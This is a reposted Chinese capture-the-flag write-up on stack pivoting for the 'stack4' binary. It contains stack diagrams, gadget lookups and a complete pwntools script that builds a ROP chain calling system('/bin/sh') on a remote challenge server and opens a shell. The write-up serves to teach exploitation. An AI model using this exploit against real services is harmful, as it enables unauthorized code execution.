Lilac Pwn stack4-stack_pivoting Writeup
Posted wulitaotao
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Lilac Pwn stack4-stack_pivoting Writeup相关的知识,希望对你有一定的参考价值。
文件类型是 64 位 ELF。
开了 NX 保护。
用 IDA64 查看一下:
可以看到 print_name 最多只能溢出 2 个字节。
也就是说只能覆盖 rbp 的最低 2 个字节。
此时需要使用栈迁移的技巧。
此题相对容易,因为已经给出了 buf 的地址,我们只需要把 main 函数栈帧的 rbp 迁移到 buf 处,然后在 buf 处构造 ROP chain 即可。
原来 print_name 栈帧的栈底指向 main 栈帧的栈底。
high address
+--------------------+ <--+
+------> | previous rbp | |
| +--------------------+ |
| | ...... | |
| +--------------------+ | main()
| | buf | |
| +--------------------+ |
| | return address | |
| +--------------------+ <--+
+------- | previous rbp | |
+--------------------+ |
| ...... | | print_name()
+--------------------+ |
| dest | |
+--------------------+ <--+
low address
覆盖后 main 栈帧的栈底迁移到 buf,然后在 buf 上构造 ROP chain,这样 main 函数返回后就去执行 ROP chain 了。
high address
+--------------------+
| previous rbp |
+--------------------+
| ...... |
+--------------------+
| ROP chain |
+--------------------+ <--+
+------> | buf | |
| +--------------------+ | main()
| | return address | |
| +--------------------+ <--+
+------- | previous rbp | |
+--------------------+ |
| ...... | | print_name()
+--------------------+ |
| dest | |
+--------------------+ <--+
low address
objdump -d stack4 | grep ‘plt‘
system 函数的地址为 0x400600
。
ROPgadget --binary stack4 --only "pop|ret" | grep "rdi"
pop rdi; ret
的地址为 0x4008a3
。
ROPgadget --binary stack4 --string "/bin/sh"
字符串 "/bin/sh" 的地址为 0x4008c9
。
所以 payload 为 fake rbp (随便填)
+ pop rdi; ret
+ "/bin/sh"
+ system
+ 填充16个字节
+ buf 的地址
print_name 中 dest 与 rbp 的距离为 48 个字节,fake rbp (随便填)
+ pop rdi; ret
+ "/bin/sh"
+ system
有 32 个字节,因此还需填充 16 个字节才到 rbp。然后 buf 的地址
只能覆盖 rbp 的最低两个字节,但是足够了,因为 main 函数中 buf 到 rbp 的距离为 256 个字节。
exp 如下:
from pwn import *
import re
# context.log_level = "debug"
# p = process("./stack4")
p = remote("47.94.239.235", 2024)
p.recvuntil(":")
buf_addr = p.recvuntil("
")
buf_addr = int(buf_addr[-15:-1], 16) # buf 的地址
# print(hex(addr))
poprdi_addr = 0x4008a3
binsh_addr = 0x4008c9
system_addr = 0x400600
payload = flat([p64(0xdeadbeef), p64(poprdi_addr), p64(binsh_addr), p64(system_addr), ‘a‘*16, p64(buf_addr) ])
p.sendlineafter("plz", payload)
p.interactive()
成功拿到 shell。
以上是关于Lilac Pwn stack4-stack_pivoting Writeup的主要内容,如果未能解决你的问题,请参考以下文章